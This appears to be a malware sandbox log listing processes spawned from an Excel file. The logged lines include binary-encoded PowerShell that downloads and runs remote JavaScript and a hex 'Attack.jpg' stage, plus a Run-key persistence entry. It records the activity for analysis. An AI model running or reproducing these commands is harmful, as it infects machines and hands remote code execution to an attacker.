$gf=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01010000,01110010,01101111,01110100,01100101,01100011,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00101110,01101010,01110011,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,01111100,01001001,01000101,01011000,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00101001) | %{ [system.text.encoding]::utf8.getstring([system.convert]::toint32($_,2)) };[system.string]::join('', $gf)|iexc:\users\test22\appdata\local\temp\notepad.jsreg add "hkcu\software\microsoft\windows\currentversion\run" /v "lol" /t reg_sz /f /d "c:\users\test22\appdata\roaming\notepad.js"cmd /c reg add "hkcu\software\microsoft\windows\currentversion\run" /v "lol" /t reg_sz /f /d "c:\users\test22\appdata\roaming\notepad.js"powershell $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) | %{ [system.text.encoding]::utf8.getstring([system.convert]::toint32($_,2)) };i`e`x([system.string]::join('', $gf))"c:\windows\system32\wscript.exe" "c:\users\test22\appdata\local\temp\notepad.js" "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $gf=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01010000,01110010,01101111,01110100,01100101,01100011,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00101110,01101010,01110011,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,01111100,01001001,01000101,01011000,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00101001) | %{ [system.text.encoding]::utf8.getstring([system.convert]::toint32($_,2)) };[system.string]::join('', $gf)|iex"c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /v "lol" /t reg_sz /f /d "c:\users\test22\appdata\roaming\notepad.js""c:\windows\system32\cmd.exe" /c copy "c:\users\test22\appdata\local\temp\notepad.js" "c:\users\test22\appdata\roaming\" /yc:\windows\syswow64\notepad.execmd /c copy "c:\users\test22\appdata\local\temp\notepad.js" "c:\users\test22\appdata\roaming\" /y

One or more non-whitelisted processes were created (11 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf))
parent_process	wscript.exe	martian_process	cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\notepad.js"
parent_process	wscript.exe	martian_process	powershell $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf))
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c copy "C:\Users\test22\AppData\Local\Temp\notepad.js" "C:\Users\test22\AppData\Roaming\" /Y
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\notepad.js"
parent_process	wscript.exe	martian_process	cmd /c copy "C:\Users\test22\AppData\Local\Temp\notepad.js" "C:\Users\test22\AppData\Roaming\" /Y
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Local\Temp\notepad.js
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\notepad.js"
parent_process	excel.exe	martian_process	Powershell $gf=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01010000,01110010,01101111,01110100,01100101,01100011,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00101110,01101010,01110011,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,01111100,01001001,01000101,01011000,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $gf)\|IEX
